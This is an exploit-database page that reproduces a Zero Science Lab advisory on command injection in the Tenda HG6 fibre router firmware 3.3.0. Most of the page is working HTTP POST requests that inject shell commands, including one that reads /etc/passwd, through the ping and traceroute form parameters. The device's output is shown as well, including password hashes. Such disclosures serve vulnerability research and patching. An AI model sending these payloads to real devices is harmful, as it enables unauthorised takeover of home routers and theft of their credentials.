Exploit for Tenda HG6 3.3.0 Remote Command Injection

Name: Exploit for Tenda HG6 3.3.0 Remote Command Injection
Rating: 5 (144 reviews)
2022-05-03 | CVSS -0.3
## https://sploitus.com/exploit?id=PACKETSTORM:166932
Tenda HG6 v3.3.0 Remote Command Injection Vulnerability  
  
  
Vendor: Tenda Technology Co.,Ltd.  
Product web page: https://www.tendacn.com  
https://www.tendacn.com/product/HG6.html  
Affected version: Firmware version: 3.3.0-210926  
Software version: v1.1.0  
Hardware Version: v1.0  
Check Version: TD_HG6_XPON_TDE_ISP  
  
Summary: HG6 is an intelligent routing passive optical network  
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),  
a voice port to meet users' requirements for enjoying the Internet,  
HD IPTV and VoIP multi-service applications.  
  
Desc: The application suffers from an authenticated OS command injection  
vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters  
in formPing, formPing6, formTracert and formTracert6 interfaces.  
  
Tested on: Boa/0.93.15  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2022-5706  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php  
  
  
22.04.2022  
  
--  
  
  
ping.asp:  
---------  
  
POST /boaform/formPing HTTP/1.1  
Host: 192.168.1.1  
  
pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564  
  
---  
TZ  
app.gwdt  
bftpd.conf  
buildtime  
check_version.txt  
config  
config.csv  
config_default.xml  
config_default_hs.xml  
dhclient-script  
dnsmasq.conf  
ethertypes  
factory_default.xml  
ftpdpassword  
group  
hardversion  
inetd.conf  
init.d  
inittab  
innversion  
insdrv.sh  
irf  
mdev.conf  
omci_custom_opt.conf  
omci_ignore_mib_tbl.conf  
omci_ignore_mib_tbl_10g.conf  
omci_mib.cfg  
orf  
passwd  
ppp  
profile  
protocols  
radvd.conf  
ramfs.img  
rc_boot_dsp  
rc_voip  
release_date  
resolv.conf  
rtk_tr142.sh  
run_customized_sdk.sh  
runoam.sh  
runomci.sh  
runsdk.sh  
samba  
scripts  
services  
setprmt_reject  
shells  
simplecfgservice.xml  
smb.conf  
softversion  
solar.conf  
solar.conf.in  
ssl_cert.pem  
ssl_key.pem  
version  
wscd.conf  
  
  
ping6.asp:  
----------  
  
POST /boaform/formPing6 HTTP/1.1  
Host: 192.168.1.1  
  
pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp  
  
---  
boa.conf  
web  
  
  
tracert.asp:  
------------  
  
POST /boaform/formTracert HTTP/1.1  
Host: 192.168.1.1  
  
traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp  
  
---  
/home/httpd  
  
  
tracert6.asp:  
-------------  
  
POST /boaform/formTracert6 HTTP/1.1  
Host: 192.168.1.1  
  
traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp  
  
---  
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh  
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh  
nobody:x:0:0::/tmp:/dev/null  
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh